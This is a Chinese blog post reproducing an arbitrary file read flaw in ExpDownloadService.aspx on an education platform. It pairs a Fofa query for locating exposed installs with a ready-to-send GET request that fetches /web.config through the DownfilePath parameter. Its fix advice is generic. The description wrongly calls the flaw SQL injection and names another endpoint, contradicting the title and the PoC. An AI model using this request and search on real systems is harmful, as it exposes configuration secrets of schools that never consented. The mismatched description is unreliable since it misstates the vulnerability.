5pm65oWn5bmz5Y+w ExpDownloadService.aspx 任意文件读取

于 2024-09-30 10:02:39 发布
阅读量255 收藏 1
点赞数 5
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142650187
版权

0x01 漏洞描述:

        5pm65oWn5bmz5Y+w的目的为全面改革,智能化教育,智慧平台UGVyc29uYWxEYXlJbk91dFNjaG9vbERhdGE=存在SQL注入漏洞,攻击者可通过该漏洞获取数据敏感信息。

0x02 搜索语句:

Fofa:body="custom/blue/uimaker/easyui.css"

0x03 漏洞复现:

GET /ExpDownloadService.aspx?DownfilePath=/web.config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

 

0x04 修复建议:

请及时更新系统和应用程序到最新版本。

‌限制应用程序和用户的权限‌,确保每个应用程序和用户只能访问其必需的最小权限资源‌

iSee857
关注
专栏目录
android+mmi是病毒?,恶意软件分析 & URL链接扫描 免费在线病毒分析平台 | 魔盾安全分析...
weixin_39920403的博客
05-26 1万+
META-INF/MANIFEST.MF"Hi^BwFr?YtoEsr#j5`OBr^C"(Vmg,!9;Oup!M?lZe$:&t~zMg;!vu>DK\vXe^}7H6uSYI=\:2eb_+Qni69le.Info[1zNnMl:pX} D<Z#(Ll[!B/g$usU7=7ybzD'kV/7l"kr$F:;f#Pf88META-INF/37WAN.SFe[G/~_s[p...
91.p9p.co ev.php下载,恶意软件分析 & URL链接扫描 免费在线病毒分析平台 | 魔盾安全分析...
weixin_36394468的博客
03-21 3万+
AndroidManifest.xmlK=}u4>RwzMYPwrv_KN0F^{-v?Oxs#N;vs;assets/Cc/cc.png9UNZ00)A,2XgE(XvUi'b8F,ZEk7al(LGp%8O$9MyGV;Ic#keh4gZJUuvPVkXrk@^_#"Dc0?X9i0I^..J)ma]I0DUM KL4w {*eYX =u=#33=u5VUqRf[[=We!vrK~bM+...
5pm65oWn5bmz5Y+wIFBlcnNvbmFsRGF5SW5PdXRTY2hvb2xEYXRh SQL注入漏洞复现
iSee857的博客
09-20 202
5pm65oWn5bmz5Y+w的目的为全面改革,智能化教育,智慧平台UGVyc29uYWxEYXlJbk91dFNjaG9vbERhdGE=存在SQL注入漏洞,攻击者可通过该漏洞获取数据敏感信息。对参数进行预编译处理,同时限制输入的特殊字符。
科讯档案管理系统reports_borrow.aspx接口存在SQL注入漏洞
2301_77012231的博客
07-26 230
安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科讯档案管理系统reports_borrow.aspx接口存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。POC。
【PianoVoice.js文件9】
Lgwind2的博客
07-25 7967
【PianoVoice.js文件9】
【PianoVoice.js文件4】
Lgwind2的博客
07-25 1343
【PianoVoice.js文件4】
BMZ-MISC-可乐加冰
qq_24033605的博客
05-05 263
BMZ-MISC-可乐加冰 (本博主不喜欢百事,喜欢可口加冰,可口才是正宗可乐) 查看16进制和属性没发现有什么特别的地方,查看crc校验码是否正确,但是工具却爆出来图片末尾存在其他文件,于是利用binwak分析一下。 查看各个文件,只有2AE96文件内容是一段有规律的文字,通过16进制将其转换成字符串。 s='8346363636954383463695953643834695959543834695953643834636363636438346363636954383463695953643834
彻底清除Zencart的cache文件夹myDEBUG.log文件
人工智能,深度学习,人脸识别
11-26 2319
经常有朋友遇到Zencart网站可以运行,但每天在cache里产生几万个myDEBUG.log的问题, 查看程序后会发现,其实也不难,主要是开始没认真去看, 按照规则显示这个myDEBUG.log分两部分,第一个是前台显示的BUG LOG,第二个是后台的显示的myDEBUG.log 其中前台文件在 /zencart/includes/extra_configures/enabl
读取图片文件到剪贴板时的html格式
热门推荐
glt3953的专栏
04-24 6万+
1.读取Word文件中的图片到剪贴板 2.读取网页中的图片url到剪贴板 3.读取网页中图片的base64值到剪贴板 <IMG alt="" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAZEAAAGzCAIAAABhJ709AAAgAElEQVR4nOy9eXQcx33vO3SOk5zrvHuvqeQmLwKUWJLvSa
HTML5对手机页面长按会粘贴复制禁用的解决方法
12-13
解决方法如下所示: 直接在CSS 文件中添加下面的代码,就可以实现了在手机端禁止粘贴复制的功能: XML/HTML Code复制内容到剪贴板 *{ -webkit-touch-callout:none; /*系统默认菜单被禁用*/ -webkit-user-...
基于计算机视觉的人脸情绪识别系统python源码(含模型+项目说明).zip
07-01
conda create -n FER python=3.8 -y conda activate FER pip install torch==1.12.0 gradio==4.29.0 torchvision==0.13.0 opencv-python==3.4.15.55 h5py==3.11.0 ``` 演示 预训练模型已经传到百度网盘,[连接]...
世界银行从移民视角看COVID19危机的恢复力(英文)2021.5(56页).pdf
02-09
这项研究得到了欧洲委员会、德国国际合作机构(GIZ)代表德国联邦经济合作与发展部(BMZ)以及瑞士发展与合作署(SDC)的支持。这些机构是KNOMAD信托基金的贡献者。 4. **独立观点**: 报告中的观点不代表世界...
Pytorch框架基于深度学习实现RAF-DB数据集人脸情绪识别源码+模型+项目说明(可作毕设).zip
07-01
下载完成后,运行`python preprocess_RAF+.py`进行图片预处理,生成h5文件 训练和评估 `python mainpre_RAF.py --bs 128 --lr 0.003` `python visualize_pro.py` 精确度 PublicTrain_acc: 99.999% PublicTest_...
ftpm_161_bmz.zip
05-07
ftpm_161_bmz.zip
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1433
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
个人计算机与网络的安全
nn_84的博客
09-24 390
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞。
数据库的全透明加密和半透明加密主要是针对数据存储安全的不同处理方式
最新发布
weixin_45699851的博客
09-25 344
对于应用程序来说,它处理的是密文,而加密过程和解密过程都是由数据库系统在后台自动完成的。这种模式下,开发者几乎察觉不到加密的存在,查询和操作的速度不会受到影响,因为大部分加密操作都在内存中快速完成。当数据被插入到数据库时,它会被加密,但对于读取数据的应用程序来说,它仍然能看到明文结果。这意味着应用程序需要知道如何处理加密后的数据,比如查询前先解密,然后对解密后的数据进行操作,再加密返回给客户端。这种方式牺牲了一些便利性,但可以提供更好的性能,因为它不需要每次查询都做完整的加密解密处理。
了解云计算工作负载保护的重要性,确保数据和应用程序安全
m0_74885516的博客
09-25 570
随着威胁的演变和环境的日益复杂,保护云工作负载变得至关重要。在这里了解有效的云计算工作负载保护(CWP)。云计算技术的快速发展使得数据和应用程序的安全性成为一项重要的需求
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值